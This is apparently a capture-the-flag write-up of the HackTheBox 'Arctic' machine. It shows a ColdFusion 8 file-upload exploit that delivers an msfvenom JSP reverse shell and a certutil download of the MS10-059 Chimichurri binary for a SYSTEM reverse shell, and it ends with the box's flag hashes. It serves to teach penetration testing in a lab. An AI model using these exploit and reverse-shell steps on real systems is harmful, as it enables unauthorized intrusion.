HackTheBox | Arctic

HackTheBox | Arctic

a month ago   •   10 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Sat Aug 20 13:08:02 2022 as: nmap -T5 -p135,8500,49154 -A -oA scan-all -Pn 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.015s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   14.87 ms 10.10.14.1
2   15.82 ms 10.10.10.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 20 13:10:21 2022 -- 1 IP address (1 host up) scanned in 139.12 seconds





Service Enumeration

TCP/8500

Let's check Exploit Database and see if there are any known exploits for this version of Adobe ColdFusion.

searchsploit ColdFusion 8

Looks like there is a Remote Code Execution (RCE) vulnerability and a Python script that should facilitate exploitation of the target.





Exploit

Copy the exploit to the current working directory:

searchsploit -m 50057

Let's take a look at the exploit. It looks like there is an unauthenticated file upload vulnerability with the upload.cfm script.

http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00

And, we need to update some variables with our IP and desired port, as well as the target IP and port.

if __name__ == '__main__':
    # Define some information
    lhost = '10.10.16.4'
    lport = 4444
    rhost = "10.10.10.11"
    rport = 8500

The Python script will then use the variables we updated and create a msfvenom JSP payload for us.

    # Generate a payload that connects back and spawns a command shell
    print("\nGenerating a payload...")
    os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')

    # Encode the form data
    form = MultiPartForm()
    form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))
    data = bytes(form)

It will also start a listener for us, open the uploaded file, and catch the shell. If your shell dies, you can just restart your listener sudo rlwrap nc -lnvp <kali-tcp-port> and navigate to http://10.10.10.11:8500/userfiles/file/filename.jsp .

Let's do this then. Update your script variables:

Run the exploit.

python3 50057.py

And, just demonstrating how you can recover your shell if needed.





Post-Exploit Enumeration

Current User

Click to expand
USER INFORMATION
----------------

User Name    SID                                          
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled



OS & Kernel

Click to expand
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ��
System Boot Time:          22/8/2022, 4:16:27 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     6.143 MB
Available Physical Memory: 5.051 MB
Virtual Memory: Max Size:  12.285 MB
Virtual Memory: Available: 11.219 MB
Virtual Memory: In Use:    1.066 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11



Users

Click to expand
User accounts for \\ARCTIC

-------------------------------------------------------------------------------
Administrator            Guest                    tolis



Groups

Click to expand
Aliases for \\ARCTIC

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*Users



Network

Interfaces
Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Tunnel adapter isatap.{79F1B374-AC3C-416C-8812-BF482D048A22}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


ARP Table
N/A


Routes
N/A


Open Ports
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:2522           0.0.0.0:0              LISTENING       1168
  TCP    0.0.0.0:2930           0.0.0.0:0              LISTENING       1168
  TCP    0.0.0.0:6085           0.0.0.0:0              LISTENING       1168
  TCP    0.0.0.0:6086           0.0.0.0:0              LISTENING       1084
  TCP    0.0.0.0:7999           0.0.0.0:0              LISTENING       1168
  TCP    0.0.0.0:8500           0.0.0.0:0              LISTENING       1168
  TCP    0.0.0.0:9921           0.0.0.0:0              LISTENING       2220
  TCP    0.0.0.0:9951           0.0.0.0:0              LISTENING       1304
  TCP    0.0.0.0:9961           0.0.0.0:0              LISTENING       2440
  TCP    0.0.0.0:19997          0.0.0.0:0              LISTENING       1184
  TCP    0.0.0.0:19998          0.0.0.0:0              LISTENING       1228
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       360
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       752
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       800
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       1168
  TCP    0.0.0.0:49171          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49175          0.0.0.0:0              LISTENING       468
  TCP    10.10.10.11:139        0.0.0.0:0              LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       672
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:2522              [::]:0                 LISTENING       1168
  TCP    [::]:2930              [::]:0                 LISTENING       1168
  TCP    [::]:6085              [::]:0                 LISTENING       1168
  TCP    [::]:7999              [::]:0                 LISTENING       1168
  TCP    [::]:8500              [::]:0                 LISTENING       1168
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       360
  TCP    [::]:49153             [::]:0                 LISTENING       752
  TCP    [::]:49154             [::]:0                 LISTENING       800
  TCP    [::]:49159             [::]:0                 LISTENING       1168
  TCP    [::]:49171             [::]:0                 LISTENING       488
  TCP    [::]:49175             [::]:0                 LISTENING       468


Ping Sweep
N/A



Processes

Click to expand
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        304 K
smss.exe                       232                            0      1.032 K
csrss.exe                      316                            0      4.316 K
wininit.exe                    360                            0      4.172 K
csrss.exe                      380                            1      5.708 K
winlogon.exe                   424                            1      4.120 K
services.exe                   468                            0      7.884 K
lsass.exe                      488                            0      9.964 K
lsm.exe                        496                            0      3.592 K
svchost.exe                    596                            0      9.236 K
svchost.exe                    672                            0      7.140 K
svchost.exe                    752                            0     10.384 K
LogonUI.exe                    760                            1     15.400 K
svchost.exe                    800                            0     30.672 K
svchost.exe                    856                            0     12.936 K
svchost.exe                    900                            0      5.188 K
svchost.exe                    940                            0     14.308 K
svchost.exe                    276                            0     11.888 K
spoolsv.exe                    960                            0     10.808 K
CF8DotNetsvc.exe              1036                            0      2.924 K
JNBDotNetSide.exe             1084                            0     24.028 K
conhost.exe                   1092                            0      2.580 K
jrunsvc.exe                   1140                            0      2.952 K
jrun.exe                      1168                            0    406.576 K
conhost.exe                   1176                            0      2.664 K
swagent.exe                   1184                            0      5.760 K
swstrtr.exe                   1216                            0      2.580 K
swsoc.exe                     1228                            0      6.260 K
conhost.exe                   1236                            0      2.580 K
k2admin.exe                   1304                            0     10.716 K
svchost.exe                   1424                            0      2.588 K
VGAuthService.exe             1492                            0     10.416 K
vmtoolsd.exe                  1740                            0     18.168 K
ManagementAgentHost.exe       1764                            0      9.284 K
WmiPrvSE.exe                  2028                            0     12.568 K
k2server.exe                  2220                            0     12.704 K
conhost.exe                   2228                            0      2.404 K
k2index.exe                   2440                            0     10.480 K
conhost.exe                   2456                            0      2.412 K
svchost.exe                   3032                            0      5.688 K
dllhost.exe                   2016                            0     11.252 K
msdtc.exe                     3208                            0      7.592 K
sppsvc.exe                    4060                            0      8.896 K
cmd.exe                       3584                            0      2.676 K
conhost.exe                   3364                            0      2.432 K
TrustedInstaller.exe          3532                            0      9.268 K
tasklist.exe                  3016                            0      5.332 K



Services

Click to expand
These Windows services are started:

   Application Experience
   Base Filtering Engine
   ColdFusion 8 .NET Service
   ColdFusion 8 Application Server
   ColdFusion 8 ODBC Agent
   ColdFusion 8 ODBC Server
   ColdFusion 8 Search Server
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic System Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Group Policy Client
   IP Helper
   IPsec Policy Agent
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Remote Procedure Call (RPC)
   Remote Registry
   RPC Endpoint Mapper
   Security Accounts Manager
   Server
   Software Protection
   SPP Notification Service
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware CAF Management Agent Service
   VMware Tools
   Windows Event Log
   Windows Firewall
   Windows Management Instrumentation
   Windows Modules Installer
   Windows Remote Management (WS-Management)
   Windows Time
   Windows Update
   Workstation



Scheduled Tasks

Click to expand
Nothing interesting outside of default system tasks.





Privilege Escalation

Windows Exploit Suggester

Run the command systeminfo on the target and copy and paste the output into a file on Kali, sysinfo.txt for example.

Now let's search for local privilege escalation options by allowing Windows Exploit Suggester to compare the patch level of the machine against a database downloaded from Microsoft.

# Download the latest patch bulletin from Microsoft
python2 windows-exploit-suggester.py -u

# Check for local privilege escalationexploits
python2 windows-exploit-suggester -d yyyy-MM-dd-mssb.xls -i sysinfo.txt -l

I searched Google for GitHub repositories containing exploits for the other two local privilege escalation exploits mentioned in the output, but eventually found a repo for this exploit.

[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important



Compiled Exploits

Ideally, you should find an exploit where you review the source code and compile it yourself. But in the case of of a CTF, I'm not too concerned with running pre-compiled exploits on this host.

windows-kernel-exploits/MS10-059: Chimichurri/Compiled at master · egre55/windows-kernel-exploits
Windows Kernel Exploits. Contribute to egre55/windows-kernel-exploits development by creating an account on GitHub.

If you view the provided screenshot of the exploit, you'll see that it takes IP and TCP port arguments, which makes it great for a reverse she..

https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/screenshot.png



Transfer the Expoit to the Target

Download the exploit to Kali and host it using a Python web server.

wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
sudo python3 -m http.server 80

certutil.exe -urlcache -split -f http://kali-vpn-ip/Chimichurri.exe Chimichurri.exe



Run the Exploit

Start a listener on a TCP port of choice and run the exploit on the target.

sudo rlwrap nc -lnvp <kali-tcp-port>

Substitute <kali-vpn-ip> and <kali-tcp-port> with the correct values for your environment.

.\Chimichurri.exe <kali-vpn-ip> <kali-tcp-port>

I takes about a minute for the exploit to run, so be patient.





Flags

C:\Users\tolis\Desktop\user.txt
62478244af1b2d305d7c397780b4f362


C:\Users\Administrator\Desktop\root.txt
8f64f959198ef76a8a53d8f286e79e1b

Spread the word

Keep reading